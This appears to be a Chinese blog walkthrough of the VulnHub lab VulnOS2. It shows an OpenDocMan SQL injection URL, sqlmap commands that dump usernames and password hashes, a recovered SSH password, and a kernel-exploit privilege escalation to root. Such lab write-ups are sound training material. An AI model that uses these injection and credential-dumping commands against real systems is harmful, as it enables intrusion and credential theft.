渗透测试实战-Vuulnhub-Vulnos2

VulnOs2 - 幕布

VulnOs2

基本介绍和信息
- 目标
  - 渗透服务器上这个公司的网站，获取root权限并找到Flag
  - 网站情况
    - JABC a bioware company
  - 端口探测
  - 目录探测
    - robots.txt
      - 没有得到什么重要的信息
    - 使用dirb扫描也没有什么重大的收获
    - 通过在网上查找，有人说在http://192.168.1.20/jabc/?q=node/7的源码中有可以利用的信息
      - 首先界面上是没有什么重要的信息
    - 在源码中
      - 找到了一个登录的地址/jabcd0cs
发现登录后台
- 也可以在那个界面全选
- http://192.168.1.20/jabcd0cs
  - 是一个OpenDoc Man 的界面
- 查找相关漏洞在https://www.exploit-db.com/上可以进行搜索，根据opendocman的版本
  - 上面有详细的信息
- 基本的介绍
  - SQL Injection[CWE-89] Improper Access Control[CWE-284]
- details
- 使用kali自带的漏洞搜索工具searchploit opendocman 搜索
  - 找到相应版本
  - 打开后面对应的文件
    - 跟在网站上查到的是一样的
- sql
  - The exploitation example below displays version of the MySQL server: http://[host]/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%,v ersion%28%29,3,4,5,6,7,8,9
    - 得到版本信息
    - 有可能是用户名什么的
  - 使用sqlmap
    - sqlmap -u "http://192.168.1.20/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -p add_value --dbms MySQL 5.5.47 --dbs
      - 有效的数据库
    - 查看jabcd0cs数据库有哪些表 sqlmap -u "http://192.168.1.20/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -p add_value -D jabcd0cs --dbms MySQL 5.5.47 --tables
      - 发现十五个表
    - 查看user表
      - sqlmap -u "http://192.168.1.20/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -p add_value -D jabcd0cs -T odm_user --dbms MySQL 5.5.47 --columns
    - 查看username 和password字段
      - sqlmap -u "http://192.168.1.20/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -p add_value -D jabcd0cs -T odm_user -C "username,password" --dbms MySQL 5.5.47 --dump
    - 对密码进行解密
  - 还可以
    - 获取密码
登录SSH
- 使用webmin webmin1980登录
探索一番后没有找到有用的，查看一下内核
- 内核版本
- 查找对应漏洞
  - 同样是searchsploit 命令
- 在Kali上建立临时HTTP服务，在目标机上下载
- 进行编译，修改权限，并运行,最后得到了具有root权限的shell
- 进入根目录查看flag

以上内容整理于幕布

posted @ 2020-05-28 10:34 llzz38 阅读(234) 评论(0) 收藏举报

刷新页面返回顶部